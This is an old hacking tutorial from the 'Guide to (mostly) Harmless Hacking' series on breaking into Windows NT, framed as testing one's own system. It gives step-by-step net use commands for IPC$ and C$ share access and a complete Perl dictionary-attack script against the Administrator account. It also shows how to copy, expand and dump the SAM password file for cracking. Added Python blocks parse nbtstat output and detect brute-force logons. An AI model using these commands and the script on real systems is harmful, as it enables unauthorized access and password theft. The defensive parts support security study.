GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 10 Part 1
How to Break into Windows NT
____________________________________________________________
by keydet89@yahoo.com
"Improving the security of your site by breaking into it, the
NT version"
The purpose of this article is to illustrate to NT users (and
sysadmins) how to test and verify the security of their own
system or site by breaking into it, using the techniques that
an attacker would use. Further, this guide assumes that you
are using NT to test an NT system...the Win95 versions of the
commands used in this guide aren't as powerful as the NT
versions.
***********************************************************
YOU COULD GO TO JAIL WARNING: Gaining unauthorized access to
computers is against the law...read the GTMHH files on computer
crime and the law. If you want to try out some or all of the
techniques presented here, make sure that you get permission.
***********************************************************
In 1993, Dan Farmer and Wietse Venema wrote a paper called
"Improving the security of your site by breaking into it." This
paper took the view of "what better way to test your computer and
network security of your site than by breaking into it." This is
a good view to take...try using "hacker" techniques to break into
your site to see how vulnerable you are. The paper in question
can be found at: http://www.trouble.org/security.
A good place to start for reference is a previous GTMHH entitled
"NT Security - Locking down the system". This guide discusses some
of the steps that need to be taken to secure an NT workstation or
standalone server. The guide also contains links to files that
contain more in-depth information and explanations, as well as
information particular to sysadmins.
In review of the previous guide, some "light" reading:
Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt
Vacuum's NT Exploits document at http://207.89.195.250/texts/
NeonSurge's documents at http://207.89.195.250/texts/
Santeria Systems' "Hardening NT" document at
http://pw2.netcom.com/~honeyluv/index.html
Most of the techniques outlined in this guide are meant to be run
against the local system, by using the IP address assigned by your ISP.
However, it's more fun to get with your friends, and connect your
systems to the Internet. Then meet at one location, and try these
techniques against your own systems. The methods described in this
guide are intended to be exercises for the reader.
[The Remote Attack]
In order to protect your system from outside attack, you need to
think like an attacker. What does an attacker want with your
system? Access...it's all about access. Regardless of the motives
or ultimate goals, an attacker wants access. Preferably, root/admin
access...the attacker wants to gain administrator access to your
system, or "own" your system. So to ensure that your system is
secure, you need to "attack" it the way the attacker would.
To begin with, you need to see what the attacker sees. In order
to find potentially vulnerable NT (or 95) systems, all you need to
do is scan a range of IP addresses to see if port 139 is open. Port
139 is the "NetBIOS session" port, that is used in file and print
sharing...which is potentially the most dangerous aspect of NT! To
locate systems with port 139 active, get a port scanner like Sam
Spade (http://www.blighty.com). Sam Spade lets you scan a range of
IP addresses for a single port. Try running whichever port scanner
you use against your own system.
********************************************************************
NEWBIE NOTE: Finding a system with port 139 open does not auto-
matically mean that the target system is 95 or NT. Un*x and Linux
systems run SAMBA, which allows them to share file "the Microsoft
way". However, the focus of this guide is NT, so we'll leave
SAMBA for another day.
********************************************************************
Okay, so you've run a port scanner against your own system and
found port 139 open. The next step is to run the "nbtstat" command
against your own system:
c:\>nbtstat -A [ipaddr]
NOTE: Make sure you use the capital "A", and the IP address
assigned by your ISP when you dial in. To see the IP address
that you were assigned, type "ipconfig /all" at the command prompt.
This will return the NetBIOS Name Table of your system. The files
mentioned above from the Rhino9 site (http://207.89.195.250/texts/)
go into more detail regarding what everything in the table refers
to, but what we (and the attacker) are interested in are the hex
codes in the center column of the table. If you see a code '<20>',
this means that your system is advertising that it has shares available.
The scary thing is that these shares are potentially available via
the Internet!! I say "potentially" because we haven't checked yet.
Okay, if you haven't seen the '<20>' code, then you can be relatively
sure that you are safe, to some degree. Just remember, as long as a
computer is turned on, and especially when it's connected to the
Internet, there is no such thing as 100% security.
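Reading the name table by eye is fine for one machine, but when you run nbtstat against every address in your own range it helps to parse the output. The following Python script is an added example and not part of the original guide: it parses a constructed sample of "nbtstat -A" output and reports whether the host registers the <20> (File Server service) name, which is the sign that it is advertising shares. The sample output, the host name "NTBOX" and the MAC address are made up; the suffix meanings are the standard NetBIOS ones.

```python
import re

# Constructed sample of "nbtstat -A [ipaddr]" output from an NT 4 host
# that has file and print sharing enabled (names padded to 15 chars).
SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
NTBOX          <00>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
NTBOX          <20>  UNIQUE      Registered
WORKGROUP      <1E>  GROUP       Registered
NTBOX          <03>  UNIQUE      Registered

MAC Address = 00-00-00-00-00-00
"""

# Standard meanings of the suffixes this check cares about.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"):  "Domain or workgroup name",
    ("03", "UNIQUE"): "Messenger Service",
    ("20", "UNIQUE"): "File Server Service (shares are being advertised)",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"):  "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"):  "Browser Service elections",
}

# One table row: name, <hex suffix>, UNIQUE|GROUP, status.
ENTRY_RE = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")


def parse_name_table(text):
    """Return the rows of the NetBIOS name table as a list of dicts."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            entries.append({"name": name, "suffix": suffix.upper(),
                            "type": ntype, "status": status})
    return entries


def advertises_shares(entries):
    """True if the host registers the <20> UNIQUE (File Server) name."""
    return any(e["suffix"] == "20" and e["type"] == "UNIQUE" for e in entries)


def describe(entries):
    """Attach a human-readable meaning to each row for a report."""
    return [(e["name"], e["suffix"], e["type"],
             SUFFIX_MEANING.get((e["suffix"], e["type"]), "other"))
            for e in entries]


if __name__ == "__main__":
    rows = parse_name_table(SAMPLE_NBTSTAT)
    for name, suffix, ntype, meaning in describe(rows):
        print(f"{name:15} <{suffix}> {ntype:6} {meaning}")
    print("advertising shares:", advertises_shares(rows))
```

Feed it the saved output of nbtstat against each of your own addresses; any host that comes back "advertising shares: True" is one you should look at with the remaining steps in this guide.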
If you do see the '<20>' code, then the next step is to gather a little
information about our system. To do that, we need to go to:
http://www.ntsecurity.com/ and get a copy of the RedButton program.
RedButton is a nifty little proof-of-concept program to show that
it is possible to log onto an NT system without presenting a username
or password. The NTSecurity.com site
(http://www.ntsecurity.com/RedButton/default.htm) describes the RedButton
program. Run the program against your own system, and see what type
of information is available. You will see any available shares,
including any hidden admin shares (ie, shares that end in "$"; by
default, there are several of these shares available...C$, WINNT$,
IPC$, etc).
The next step is to attempt to log into your system by using the
"net" command. To do this, you need to attempt to connect to the
"IPC$" share, which is one of the default, hidden shares that is part of
the NT installation. Attempting to make this connection is best done
from a remote machine, preferably a friend's NT system.
Attempt the connection by typing:
c:\>net use \\[ipaddr]\ipc$
********************************************************************
NEWBIE NOTE: The IPC$ share isn't a "share" in the sense that it
is a directory, disk or printer. First off, you can see by the "$"
that it's an admin share that is created by default when the system
is booted. IPC stands for "interprocess communications", and the
IPC$ share provides the capability for logging into the system.
Remember that...if the sysadmin for the target server has enabled
auditing of successful and failed login attempts, then the IPC$
connection attempt will show up in the EventLog. This is true even
if you don't successfully log in...it's recorded as a failed login
attempt.
The concept of the IPC$ share is covered in greater detail in Hobbitt's
CIFS file at http://207.98.195.250/texts/cifs.txt and Vacuum's NT
Exploits document at http://207.89.195.250/texts/.
********************************************************************
When this connection is attempted, the currently logged on username
and password from the local system are sent for authentication. If
you are logged on as "Administrator", this may not be a problem, and
only password guesses will be required. If you (rather foolishly) use
a "null" password (ie, don't use a password at all), then logging in
is a trivial matter. You may laugh, but you would be surprised at the
number of NT systems that don't have a password for the Administrator
account.
The 'net' command can also be run using username and password guesses:
c:\>net use \\xxx.xxx.xxx.xxx\ipc$ /user:
This command will either fail, or be completed successfully...the
command will not pause waiting for further input, such as a password.
That makes this syntax very easy to add to scripts and batch files.
NAT (a program available from http://www.secnet.com) will automate
these attempts, based on user-configurable files. NAT can be used in
conjunction with dictionary files and wordlists to attack specific user
accounts, such as Administrator. If you have changed the name of the
Administrator account, as suggested by Microsoft and various
professional security consulting firms, you can still use RedButton to
determine what that new name is and attack it.
Download a copy of NAT (you can get versions of NAT for 95/NT or
Linux) and try running it against either your system or your buddy's
system.
The downside of NAT is that when given two files, it tries the first
username and all of the passwords in the password list, before moving
on to the second username. NAT can be configured to some degree but
you can also use tools such as Perl to configure this "dictionary
attack" to your own tastes. You can create a Perl script that
includes the following command:
open(IPC, "net use \\\\xxx.xxx.xxx.xxx\\ipc\$ /user: | ");
********************************************************************
NEWBIE NOTE: Perl is a great programming language to learn on your
way to other languages, such as C or Java. It's an interpreted
language, like Java, but much faster than Java. Also, just about
every Un*x sysadmin knows how to program in Perl. Fortunately, there
is a version of Perl available for 95 and NT at
http://www.activestate.com . There is also a wealth of reference
material and examples of Perl scripts available from
http://www.perl.com.
********************************************************************
The following Perl script can be used to conduct a dictionary attack
against your own system or a friend's system (with his permission, of
course):
----- begin script -----
# ipcchk.plx by Keydet89
# script to take names from a text file, and attempt to
# complete the IPC$ connection to the Administrator account
# using each name as the password
# successful connections are logged to the log file
# no checking of arguments is provided, user must enter a
# valid IP address for the target server
#
# usage: c:\>perl ipcchk.plx [ipaddr]
open(TEST, "names.txt") || die "Could not open file.";
open(LOG, ">>ipc.log") || die "Could not open log.";
if (length($ARGV[0]) == 0) {
  print "Usage: perl ipcchk.plx [ipaddr]\n";
  exit(0);
}
$server = $ARGV[0];
# one candidate password per line in names.txt
while (<TEST>) {
  $name = $_;
  chop($name);
  # print "net use \\\\$server\\ipc\$ /user:Administrator $name | \n";
  # run the net command and read its output through the IPC filehandle
  open(IPC, "net use \\\\$server\\ipc\$ /user:Administrator $name | ");
  while (<IPC>) {
    if (/successfully/) {
      print LOG "$server accepts connections for password $name\n";
      # delete a successful connection to avoid multiple connections to
      # the same machine
      open(DEL, "net use \\\\$server\\ipc\$ /d | ");
      close(DEL);
    }
  }
  close(IPC);
}
close(LOG);
close(TEST);
----- end script -----
This script is easily configurable, and can be run on a system with
Perl for Win32 installed. For information on installing Perl for
Win32 on your 95 or NT system, see:
http://reference.perl.com/query.cgi?windows
Minor modifications to this script will allow you to conduct a similar
attack against other accounts on your system.
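The NEWBIE NOTE on the IPC$ share above points out that every connection attempt lands in the Security log when logon auditing is on, and a dictionary run like the one above leaves a very recognisable pattern there: a burst of failed network logons against one account from one workstation, sometimes followed by a success. The following Python script is an added example and not part of the original guide, of NAT or of ipcchk.plx: it reads constructed Security-log records (NT 4 event 529 is "Logon Failure: Unknown user name or bad password", event 528 is "Successful Logon", and Logon Type 3 is a network logon) and flags any source that crosses a failure threshold within a time window, plus any success that follows a run of failures. The record layout, workstation names and timestamps are constructed for the example; a real log would be exported from Event Viewer and mapped onto the same five fields.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGON_FAILURE = 529   # NT 4: "Logon Failure: Unknown user name or bad password"
LOGON_SUCCESS = 528   # NT 4: "Successful Logon"
NETWORK_LOGON = 3     # Logon Type 3: network logon, e.g. a "net use" to IPC$

# Constructed sample records, one per line, in log order:
#   timestamp | event id | user name | logon type | source workstation
# WKS02 is a user mistyping a password once; WKS01 is a dictionary run
# against Administrator that gets in on the seventh try; CONSOLE is an
# interactive (type 2) failure that the network-logon check ignores.
SAMPLE_LOG = """\
1998-05-01 22:13:40|529|bob|3|WKS02
1998-05-01 22:13:45|528|bob|3|WKS02
1998-05-01 22:14:01|529|Administrator|3|WKS01
1998-05-01 22:14:02|529|Administrator|3|WKS01
1998-05-01 22:14:03|529|Administrator|3|WKS01
1998-05-01 22:14:04|529|Administrator|3|WKS01
1998-05-01 22:14:05|529|Administrator|3|WKS01
1998-05-01 22:14:06|529|Administrator|3|WKS01
1998-05-01 22:14:07|528|Administrator|3|WKS01
1998-05-01 22:20:00|529|Administrator|2|CONSOLE
"""


def parse_log(text):
    """Turn the pipe-delimited records into dicts with a real timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, user, ltype, src = line.split("|")
        events.append({"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "event_id": int(eid), "user": user,
                       "logon_type": int(ltype), "source": src})
    return events


def detect_guessing(events, threshold=5, window=timedelta(seconds=60),
                    min_failures_before_success=3):
    """Flag password guessing over network logons.

    Keeps, per (source, user), the timestamps of failures inside the
    window. Alerts once when the count first reaches the threshold, and
    again if a success arrives while enough failures are still in view.
    """
    alerts = []
    recent = defaultdict(deque)
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != NETWORK_LOGON:
            continue
        key = (ev["source"], ev["user"])
        q = recent[key]
        while q and ev["time"] - q[0] > window:   # drop failures outside the window
            q.popleft()
        if ev["event_id"] == LOGON_FAILURE:
            q.append(ev["time"])
            if len(q) == threshold:
                alerts.append({"type": "guessing", "source": ev["source"],
                               "user": ev["user"], "failures": len(q),
                               "first": q[0], "last": ev["time"]})
        elif ev["event_id"] == LOGON_SUCCESS and len(q) >= min_failures_before_success:
            alerts.append({"type": "success_after_failures", "source": ev["source"],
                           "user": ev["user"], "failures": len(q), "at": ev["time"]})
            q.clear()
    return alerts


if __name__ == "__main__":
    for a in detect_guessing(parse_log(SAMPLE_LOG)):
        print(a)
```

The second alert type is the one that matters most: a run of 529s ending in a 528 for the same account from the same workstation is the signature of a guess that worked, and the account's password should be treated as known.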
The IPC$ share is the key to compromising an NT server. It is only
following a successful connection that the real work toward exploiting
this vulnerability can be done. This is especially true if you've
gained access via the Administrator account, or an account in the
Administrator group.
Once you have successfully completed an IPC$ connection to your
buddy's machine, you can then try to see if he has any shares
available using the 'net' command:
c:\>net view \\[ipaddr]
Depending upon how your friend set up his machine, there may or may not
be shares available. If shares are available, you can attempt to
connect to them using the 'net' command:
c:\>net use x: \\[ipaddr]\[share]
If this command doesn't work the first time, don't worry. You can
follow the same steps as above to attempt a dictionary attack. You
shouldn't need to, however...if you gained access to your friend's
machine via the Administrator account.
But you're not safe just because you haven't specifically made
shares available yourself. Even if the C:\ drive itself isn't
specifically shared on the server, you still have access to it as the
C$ share if the IPC$ connection leads to Administrator access. Once
the connection to the IPC$ share is successfully completed, the next
command to attempt is:
c:\>net use g: \\xxx.xxx.xxx.xxx\c$
*******************************************************************
NEWBIE NOTE: Notice this command is a little different from the
earlier version of the "net use" command. In this case, the "c$"
share is a physical disk on the target server, so you need to
assign it a device name on your local machine. To see the syntax
for this command, enter "net use /?" at the command prompt.
*******************************************************************
Once you've gained access to the C$ share, type:
c:\>dir g: /p
to view the contents of your friend's C:\ drive.
If you have successfully completed the IPC$ connection, you can do
other things besides access 'hidden' (as in 'not anymore!!') shares.
Once your friend creates an account for you and places it in the
Administrator group, log in via the IPC$ connection. Then click
Start -> Run, and type 'regedit'. Choose Registry -> Connect
Network Registry..., and type the IP address of your friend's machine
into the dialogue box. Wait a minute, and you will be able to view
parts of his Registry.
[Password Cracking]
If you gain access to the system (I should say 'your' system), then
there are several things you can do. Let's say you've gone after
/etc/passwd files on Un*x systems...how would you do this on an NT
system? NT keeps user passwords in the SAM (Security Accounts Manager)
file. When a system is turned on, you generally can't access
this file, especially if you are a regular user (ie, not Administrator).
However, in the c:\winnt\repair directory, you will see a file
called "SAM._". This is the compressed version of the SAM database
that is created when the system is installed, and updated whenever
the rdisk utility is run. Users have the ability to read (and copy)
this file.
Note: The next exercise is intended to be run on your own machine.
However, once you have access to a friend's computer and connected to
the C$ share (shown above), you can get a copy of the SAM._ file from
his machine by typing:
c:\>copy g:\winnt\repair\sam._
So let's have a little fun. First, create several user accounts in
User Manager, using blank or easily guessable passwords...words from
the dictionary, etc. You can use these accounts to either try
breaking into your system, or provide valid accounts to your friends
so that only they can log in. After you've created the accounts,
have a couple of blank, formatted diskettes available, and type:
c:\>rdisk /s
Follow the instructions that appear in the windows. When you're done,
go to the c:\winnt\repair directory, and copy the "SAM._" file to
another directory (for the purposes of this exercise, c:\temp).
Now type:
c:\temp>expand SAM._ sam
Now pass the file through SAMDump (you can find SAMDump at
http://www.nmrc.org/files/snt/index.html) in order to put the file
in a format that is usable by a password cracker:
c:\temp>samdump sam > samfile
You now have a usable "samfile". Now you just need to run a
password cracker, such as l0phtcrack (from either http://www.l0pht.com
or http://www.nmrc.org/files/snt/index.html) or NTCrack (from
either http://www.secnet.com or
http://www.nmrc.org/files/snt/index.html)
Once you gain access to your friend's computer, you can leave little
backdoors and practical jokes...if your friend has a sense of humor.
Coming next GTMHH: WinNT Back Doors and Practical Jokes!
_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out
the official Happy Hacker Web page at http://www.happyhacker.org.
We are against computer crime. We support good, old-fashioned hacking of the
kind that led to the creation of the Internet and a new era of freedom of
information. But we hate computer crime. So don't email us about any crimes
you have committed!
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless
Hacking, please email hacker@techbroker.com with message "subscribe
happy-hacker" in the body of your message.
Copyright 1998 keydet89. You may forward, print out or post this
GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave
this notice at the end.
_________________________________________________________
Carolyn Meinel
M/B Research -- The Technology Brokers
http://techbroker.com